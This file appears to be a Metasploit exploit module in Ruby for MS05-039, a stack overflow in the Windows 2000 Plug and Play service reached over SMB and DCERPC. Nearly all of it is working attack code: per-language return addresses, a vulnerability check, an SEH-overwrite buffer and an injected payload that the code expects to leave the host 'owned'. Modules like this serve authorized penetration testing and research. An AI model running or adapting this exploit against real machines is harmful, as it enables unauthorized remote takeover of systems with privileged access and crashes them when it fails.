require 'msf/core' module Msf class Exploits::Windows::Smb::MS05_039_PNP < Msf::Exploit::Remote include Exploit::Remote::SMB include Exploit::Remote::DCERPC def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft PnP MS05-039 Overflow', 'Description' => %q{ This module exploits a stack overflow in the Windows Plug and Play service. This vulnerability can be exploited on Windows 2000 without a valid user account. Since the PnP service runs inside the service.exe process, a failed exploit attempt will cause the system to automatically reboot. }, 'Author' => [ 'hdm' ], 'License' => GPL_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '18605'], [ 'CVE', '2005-1983'], [ 'BID', '14513'], [ 'MSB', 'MS05-039'], [ 'URL', 'http://www.hsc.fr/ressources/presentations/null_sessions/'], [ 'MIL', '87'], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Privileged' => true, 'Payload' => { 'Space' => 1000, 'BadChars' => "", 'Compat' => { # -ws2ord XXX? }, }, 'Targets' => [ [ 'Windows 2000 SP0-SP4', # Tested OK - 11/25/2005 hdm { 'Platform' => 'win', 'Ret' => 0x767a38f6, # umpnpmgr.dll }, ], [ 'Windows 2000 SP4 French', { 'Platform' => 'win', 'Ret' => 0x767438f6, # French target by ExaProbe }, ], [ 'Windows 2000 SP4 Spanish', { 'Platform' => 'win', 'Ret' => 0x767738f6, # umpnpmgr.dll }, ], [ 'Windows 2000 SP0-SP4 German', { 'Platform' => 'win', 'Ret' => 0x767338f6, # German target by Michael Thumann }, ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 9 2005')) register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'browser']), ], self.class) end def pnp_probe(req) connect() handle = dcerpc_handle('8d9f4e40-a03d-11ce-8f69-08003e30051b', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") # CS_DES cs_des = NDR.long(0) + # CSD_SignatureLength NDR.long(0) + # CSD_LegacyDataOffset NDR.long(req.length) + # CSD_LegacyDataSize NDR.long(0) + # CSD_Flags Rex::Text.rand_text(16) + # GUID req # CSD_LegacyData # PNP_QueryResConfList(L"a\\b\\c", 0xffff, (char *)pClassResource, 1000, foo, 4, 0); # ResourceName: stubdata = NDR.UnicodeConformantVaryingString("a\\b\\c") + # ResourceName, passes both IsLegalDeviceId and IsRootDeviceID NDR.long(0xffff) + # ResourceID: ResType_ClassSpecific NDR.UniConformantArray(cs_des) + # Resource (our CS_DES structure) NDR.long(cs_des.length) + # ResourceLen NDR.long(4) + # OutputLen (at least 4) NDR.long(0) # Flags begin dcerpc.call(0x36, stubdata) rescue Rex::Proto::DCERPC::Exceptions::NoResponse print_status('server did not respond, but we do not expect it to.') else print_status('should be owned now...') end # Cleanup handler disconnect if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil and dcerpc.last_response.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00") return true else return false end end def check if (pnp_probe('A')) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit # Pad the string up to reach our SEH frame buf = Rex::Text.rand_text(56) # Jump over the address and our invalid pointer to the payload buf << Rex::Arch::X86.jmp_short('$+32') buf << Rex::Text.rand_text(2) # The SEH handler pointer buf << [target.ret].pack('V') # Some padding to reach the next pointer buf << Rex::Text.rand_text(20) # ResourceName - cause access violation on RtlInitUnicodeString buf << Rex::Text.rand_text(3) + "\xff" # Append the encoded payload and we are good to go! buf << payload.encoded pnp_probe(buf) end end end